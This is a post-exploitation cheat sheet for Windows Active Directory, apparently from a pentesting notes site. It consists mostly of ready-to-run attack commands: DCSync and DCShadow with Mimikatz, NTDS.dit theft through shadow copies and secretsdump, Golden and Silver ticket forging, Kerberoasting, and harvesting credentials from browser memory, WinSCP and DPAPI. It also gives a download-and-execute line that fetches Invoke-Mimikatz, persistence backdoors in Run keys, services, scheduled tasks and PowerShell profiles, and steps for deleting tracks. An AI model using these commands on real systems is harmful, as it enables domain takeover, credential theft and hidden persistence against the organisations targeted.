Post exploitation techniques
DC SHADOW
# DC Shadow is a post-compromise attack, allowing you to update replication metadata
# On a compromised client, using a domain admin account
# You can attack with Mimikatz
# Terminal 1 (runas)
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42
# Terminal 2 (runas)
mimikatz # lsadump::dcshadow /push
# You can check the success through repadmin on the DC
repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"
NTDS database
# Initial location of the NTDS database on the domain controller
C:\Windows\NTDS\NTDS.dit
# Step 1 → Finding a way to get the NTDS.dit and SYSTEM files
# Step 2 → Crack/Analyze offline
Local Extraction
VSSadmin
# Récupération via VSSadmin
# Create a Volume Shadow Copy
C:\Windows\system32> vssadmin create shadow /for=C:
# Retrieve NTDS from the copy
C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit c:\Extract\ntds.dit
# Copy SYSTEM file
C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS
C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM
# Delete tracks
C:\Windows\system32> vssadmin delete shadows /shadow={uuid}
# Trick if you are on a semi-interactive shell
# You can specify /quiet option to not get the prompt
# Can be useful for deletion (as it requires confirmation)
vssadmin delete shadows /shadow={uuid} /quiet
ntdsutil tool
# ntdsutil is a builtin tool used to manage the AD
# You can abuse it and create a backup of the ntds.dit file
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
DC Sync / Mimikatz
# DC Sync is a less noisy way to extract user information
# It uses the DRS (Directory Replication Service)
# Classic
mimikatz # lsadump::dcsync /domain:domain.lan /all /csv
# Specific user
mimikatz # lsadump::dcsync /domain:domain.lan /user:test
PowerSploit
# PowerSploit contains a script using the volume shadow copy service
Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy
# Also possible through a meterpreter session
powershell_shell
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy
Invoke-DCSync
# Powershell script
# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz
Invoke-DCSync
# Get other format (user:id:lm:ntlm)
Invoke-DCSync -PWDumpFormat
# It is also possible through a meterpreter session
Nishang
# Nishang is a post exploitation framework allowing an attacker to perform attacks
# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
# You can also use them through a meterpreter session by loading the powershell extension
load powershell
powershell_import /root/Copy-VSS.ps1
powershell_execute Copy-VSS
# Also possible to establish a direct connection
powershell_shell
PS > Copy-VSS
PS > Copy-VSS -DestinationDir C:\ninja
Remote Extraction
CrackMapExec
crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi
WMI - Remote
# It is possible to remotely extract the NTDS database using WMI and VSSADMIN
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
Impacket
$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
NTDS Extraction and analysis
# Impacket provides a useful script to do that (decrypt copied files)
impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit DOMAIN
# Also possible to dump it remotely by using the computer account and its hash
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
# Extraction is also possible using NTDSDumpEx
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
# Or adXtract
./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab
Empire
# Empire has 2 modules you can use to retrieve hashes through DCSync
usemodule credentials/mimikatz/dcsync_hashdump
usemodule credentials/mimikatz/dcsync
Ticket generation from Linux
# Generate a ticket or convert it (kekeo) to ccache format
$ ticketer.py -nthash <hash> -domain-sid <sid> -domain <domain> <user>
# Export the path in the right variable
$ export KRB5CCNAME=/tmp/ticket.ccache
$ klist
# Exec and use the ticket
$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host
# Dump NTDS
$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss
Golden Ticket
# Golden Ticket
> Nom du compte administrateur (Administrateur)
> Nom complet du domaine (domain.local)
> SID du domaine (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]
> Hash NTLM du compte krbtgt (6194bd1a5bf3ecd542e8aac9860bddf0)
mimikatz # privilege:debug
mimikatz # lsadump::lsa /inject /name:krbtgt
mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt
Use :
mimikatz # kerberos::ptt domain.local.kirbi
mimikatz # kerberos::list
# Resource
https://twitter.com/mpgn_x64/status/1241688547037532161
# Golden ticket and access denied?
# from cmd (elevated)
> mimikatz kerberos::golden
> klist add_bind <DOMAIN> <DC>
> psexec \\dc\ cmd
Playing with tickets on Windows
# Sessions en cours
mimikatz # sekurlsa::logonpasswords
# Ticket TGT
# Dump SPN
PS C:\> Find-PSServiceAccounts -DumpSPN
Discovering service account SPNs in the AD Domain foo.local
svcSQLServ/pc1.foo.local:1433
# Download Mimikatz
PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
PS C:\> Invoke-Mimikatz
mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
# Lister les tickets actifs ou les purger
PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'
PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'
PS C:\> klist
# Demander un ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"
# Exporter un ticket
mimikatz # kerberos::list /export
# Crack Ticket
python tgsrepcrack.py wordlist.txt ticket.kirbi
Tips
# Getting passwords from browser memory
procdump.exe -ma firefox_pid
strings.exe firefox.dmp | findstr /i "Passwd="
Scavenger
# Scavenger is a tool used above CrackMapExec to automate the process
# of looking for sensitive files and information during Internal Pentest
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite
WinSCP
# WinSCP session credentials stored in the registry are recoverable if a master password is not used
# You can manually request the key
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"
# Then recover the password using the following binary
https://github.com/anoopengineer/winscppasswd/releases
.\winscppasswd ip user
# Automation using CrackMapExec
# Using invoke_sessiongopher you can recover information about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP
crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher
Snaffler
https://github.com/SnaffCon/Snaffler
# Snaffler is a tool made to automate information gathering on windows and domains
# it focuses on locations such as network shares etc.
snaffler.exe -s -o snaffler.log
-o Enables outputting results to a file. You probably want this if you're not using -s. e.g. -o C:\users\thing\snaffler.log
-s Enables outputting results to stdout as soon as they're found. You probably want this if you're not using -o.
-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug
-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.
-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.
-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.
-d Domain to search for computers to search for shares on to search for files in. Easy.
-c Domain controller to query for the list of domain computers.
-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.
-j How many bytes of context either side of found strings in files to show, e.g. -j 200
-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.
DonPAPI
https://github.com/login-securite/DonPAPI
# Dumping relevant information on compromised targets without AV detection
# With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.
# Currently gathered info
# - Windows credentials (Task Scheduler credentials & a lot more)
# - Windows Vaults
# - Windows RDP credentials
# - AdConnect (still require a manual operation)
# - Wifi key
# - Internet Explorer credentials
# - Chrome cookies & credentials
# - Firefox cookies & credentials
# - VNC passwords
# - mRemoteNG password (with default config)
# Classic launch
DonPAPI.py domain/user:passw0rd@target
# Using hash
DonPAPI.py --hashes <LM>:<NT> domain/user@target
# Using Kerberos or local auth
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
# If user has LAPS reading privilege
DonPAPI.py -laps domain/user:passw0rd@target
# If you are domain admin, you can dump the domain backup key using impacket
# Then you can use the PVK (backup key) to dump all users secrets
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
PERSISTENCE
Resources
https://rastamouse.me/2018/03/a-view-of-persistence/
Userland & Elevated
# Userland techniques
# HKCU
# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).
Value name: Backdoor
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
# Start-up
# Create a batch script in the user startup folder.
PS C:\> gc "C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat"
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
# Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
# Powershell profiles
# You can backdoor the powershell profile
PS C:\> Test-Path $profile
False
PS C:\> New-Item -Path $profile -Type File –Force
Directory: C:\Users\Rasta\Documents\WindowsPowerShell
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1
PS C:\> $string = 'Start-Process "cmd.exe"'
PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
# Elevated techniques
# HKLM
# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
# Services
# Create a service that will start automatically or on-demand.
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
# Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
Maintaining Privilege
# Steal passwords and use them with runas
runas /netonly /user:FS01\Administrator cmd
# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.
# Both domain accounts and local accounts can work.
mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
# Adding new local users can be a method to get back into machines
# Administrators local group is a solution, but you can also use the following groups
Remote Desktop Users
Remote Management Users
Backup Operators
# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
# Golden tickets can be used to forge access to any service in the domain.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt
Last updated